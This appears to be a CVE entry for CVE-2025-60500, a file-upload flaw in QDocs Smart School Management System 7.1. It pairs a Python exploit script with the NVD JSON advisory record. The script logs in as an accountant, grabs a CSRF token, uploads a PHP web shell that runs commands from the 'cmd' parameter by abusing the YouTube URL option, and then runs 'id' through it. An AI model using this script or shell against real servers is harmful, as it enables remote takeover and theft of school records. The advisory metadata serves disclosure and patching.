CVE-2025-60500

# CVE-2025-60500 - QDocs Smart School Management System 7.1 # Arbitrary File Upload via YouTube URL Option Bypass # Reference: https://github.com/H4zaz/CVE-2025-60500 import requests from bs4 import BeautifulSoup import re TARGET_URL = "http://target-qdocs-server.com" USERNAME = "accountant_user" PASSWORD = "password123" # Step 1: Login to the QDocs system session = requests.Session() login_url = f"{TARGET_URL}/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data) print(f"[*] Login response status: {response.status_code}") # Step 2: Get CSRF token from media upload page upload_page_url = f"{TARGET_URL}/media/upload" response = session.get(upload_page_url) soup = BeautifulSoup(response.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] # Step 3: Prepare malicious PHP payload disguised as YouTube URL # The PHP payload will be uploaded via the alternate YouTube URL option php_payload = """<?php // Malicious PHP shell - uploaded via YouTube URL bypass if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>""" # Step 4: Upload PHP file using the YouTube URL bypass files = { 'youtube_url': (None, 'https://www.youtube.com/watch?v=bypass'), 'media_file': ('shell.php', php_payload, 'application/x-php') } upload_data = { 'csrf_token': csrf_token, 'upload_type': 'youtube_url', # Abuse the YouTube URL option 'youtube_url': 'https://www.youtube.com/watch?v=bypass' } response = session.post(upload_page_url, data=upload_data, files=files) print(f"[*] Upload response status: {response.status_code}") # Step 5: Access the uploaded PHP shell shell_url = f"{TARGET_URL}/uploads/media/shell.php?cmd=id" response = requests.get(shell_url) print(f"[*] Shell execution result: {response.text}")

{"cve": {"id": "CVE-2025-60500", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:40.047", "lastModified": "2025-11-17T12:46:55.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QDocs Smart School Management System 7.1 allows authenticated users with roles such as \"accountant\" or \"admin\" to bypass file type restrictions in the media upload feature by abusing the alternate YouTube URL option. This logic flaw permits uploading of arbitrary PHP files, which are stored in a web-accessible directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qdocs:smart_school:7.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "73D99BC7-4DF7-4C42-AD64-6850F2C04794"}]}]}], "references": [{"url": "https://github.com/H4zaz/CVE-2025-60500", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}